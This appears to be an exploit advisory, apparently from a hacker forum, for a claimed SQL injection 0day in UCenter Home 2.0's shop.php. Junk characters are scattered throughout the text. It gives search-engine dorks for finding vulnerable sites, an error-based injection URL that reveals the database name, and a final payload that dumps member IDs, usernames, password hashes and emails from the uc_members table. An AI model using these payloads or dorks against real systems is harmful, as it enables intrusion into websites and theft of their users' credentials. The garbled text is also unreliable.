; |' A) W! y- d W3 T. s3 O__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
* U. g8 ` {0 a4 n' D3 c8 H
; `8 p3 q* M7 N7 Y+ m
+ o/ F: R+ K2 i- c! P
: L4 a# [ w' ?' L& ^*/ Author : KnocKout 8 ?: u/ W' W4 S& _. O3 w u- p5 a
& |3 l: ]& N1 r* [. U9 m*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
; F6 r; Y5 ^8 g$ y( W- F- r- Q- J9 Q8 Z% _
*/ Contact: knockoutr@msn.com # F0 q9 ]( a& ~- c, ?4 ?5 F4 p
- C# R$ i4 Q s+ C2 k4 Z4 Q*/ Cyber-Warrior.org/CWKnocKout 1 v: J' t& U- \0 i# U& l
# O1 o' y: W& L& n0 j__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 5 c) U7 m: r1 N% |
: g! w7 b& W7 a+ FScript : UCenter Home
" T. u8 R( p0 `( q
( E6 `' Y, }7 r# ]5 ~Version : 2.0 : v/ e+ ~! F3 u @! V+ U8 H
* Y3 ]$ y& c8 Y+ X" e
Script HomePage : http://u.discuz.net/ 3 _7 n1 O# q$ w9 v! F. W
2 a6 j/ ]& T2 I" ~7 c__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
5 v1 P; O7 e, A+ o. ?" i. X/ }7 E9 d% i# Z6 }) x
Dork : Powered by UCenter inurl:shop.php?ac=view
/ W' |& C( v" C( S" Z
. ]- N/ |( L) O5 q. N# zDork 2 : inurl:shop.php?ac=view&shopid=
. p6 C4 _! [" y1 C+ e9 c. k9 U3 N+ D/ o& Q0 j( D: y# t& ]$ @4 ]1 M, V
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
' L3 A$ l) C/ f: g2 u
& `2 j! s, h c4 n1 Z0 bVuln file : Shop.php & x, j9 { Z* b
, u L0 i2 ?$ d. S Vvalue's : (?)ac=view&shopid= * n" b' L' {+ {: T; X8 j# o
0 t( b4 e' g+ ]9 _ W5 sVulnerable Style : SQL Injection (MySQL Error Based)
, M/ @/ X; A8 U( n) F, t; O) t4 J0 b
Need Metarials : Hex Conversion
$ o/ R4 a' ~* }+ e8 i8 n3 `
1 L, I! d& J9 r# v2 m3 ?: x__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
$ O: i' K1 A! n& a+ m+ \
- b; I6 Z7 I4 r5 AYour Need victim Database name.
- T& }! v7 O* Q) h+ L' I; \0 x2 L% `( ~7 R
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
1 G# m" z2 o' X# @& W- M: q
3 Y J, Y& P5 `4 B2 l..
. i- P6 A2 Z/ g" r9 O5 H
' k1 t, P5 r4 V: |DB : Okey. ( m$ A @$ i9 g+ v) s
1 }' h9 l, j# a3 @your edit DB `[TARGET DB NAME]`
/ G3 a7 S: o! @, r; r7 d5 N5 @! ~
Example : 'hiwir1_ucenter'
+ s5 t* b: C8 O* l) b1 d* e
& f V. n* Z- i: V/ a8 HEdit : Okey.
! Z2 |7 }/ C0 m7 Q* w3 |' ]5 V& V# R' m/ ^$ h# w& T+ E$ }. x% H
Your use Hex conversion. And edit Your SQL Injection Exploit.. . Q6 x; b8 s$ h2 ]0 z- p
4 Z2 X+ {5 r) C, T$ K+ p1 T4 V% m 6 T: a0 t; h8 Y% s& K$ [( X4 R: N( G
( u3 g6 q+ j- f5 ]Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 4 q" l% r/ Q A1 B6 B% J I/ j! E
|